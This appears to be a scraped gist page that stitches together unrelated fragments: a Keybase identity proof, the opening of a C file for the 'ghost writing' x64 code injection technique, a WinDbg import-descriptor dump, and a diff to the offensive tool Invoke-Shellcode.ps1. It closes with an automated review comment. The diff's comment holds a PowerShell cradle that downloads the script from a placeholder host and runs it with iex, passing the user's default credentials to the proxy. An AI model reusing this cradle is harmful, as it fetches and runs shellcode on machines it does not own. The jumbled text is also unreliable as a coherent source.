I hereby claim:
- I am hatRiot on github.
- I am droner (https://keybase.io/droner) on keybase.
- I have a public key whose fingerprint is B6F4 7EF5 4F44 CC36 1731 60E1 13A4 51C8 439D 800A
To claim this, I am signing this object:
/*
simple x64 implementation of the ghost writing code injection technique. note this is JUST FOR REFERENCE and won't
work in your sweet new c2 off the shelf. it also uses capstone. check out pinjectra for a more feature rich and stable version of this.
*/
#include "stdafx.h"
#include <Windows.h>
#include "include/capstone/capstone.h"
#pragma comment(lib, "capstone.lib")
0:023:x86> dt _IMAGE_IMPORT_DESCRIPTOR 0x40000+0x91d0+0n40
ole32!_IMAGE_IMPORT_DESCRIPTOR
+0x000 Characteristics : 0x9290
+0x000 OriginalFirstThunk : 0x9290
+0x004 TimeDateStamp : 0
+0x008 ForwarderChain : 0
+0x00c Name : 0x99be
+0x010 FirstThunk : 0x900c
0:023:x86> da 0x40000+0x99be
000499be "KERNEL32.dll"
# apply to Invoke-Shellcode.ps1 | |
# invoke with: | |
# PS > $wc = New-Object Net.WebClient ; $wc.UseDefaultCredentials = $true; $wc.Proxy.Credentials = $wc.Credentials ; iex $wc.DownloadString("http://host/Invoke-Shellcode.ps1") | |
596,599c596 | |
< | |
< $proxy = [System.Net.WebRequest]::GetSystemWebProxy() | |
< $proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials | |
< | |
--- |
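Review bot: the 596,599c596 change touches the two lines that take the system proxy and assign [System.Net.CredentialCache]::DefaultCredentials to it, but nothing in the patch says why, and the header comment only shows the caller setting $wc.Proxy.Credentials on its own WebClient. DefaultCredentials hands the logged-on user's credentials to whatever proxy the system resolves, so the patch header should state which side (caller or script) is expected to configure the proxy after this change and that the credentials are forwarded implicitly. The replacement side after the --- separator is not visible here, so the resulting line 596 cannot be checked against that description.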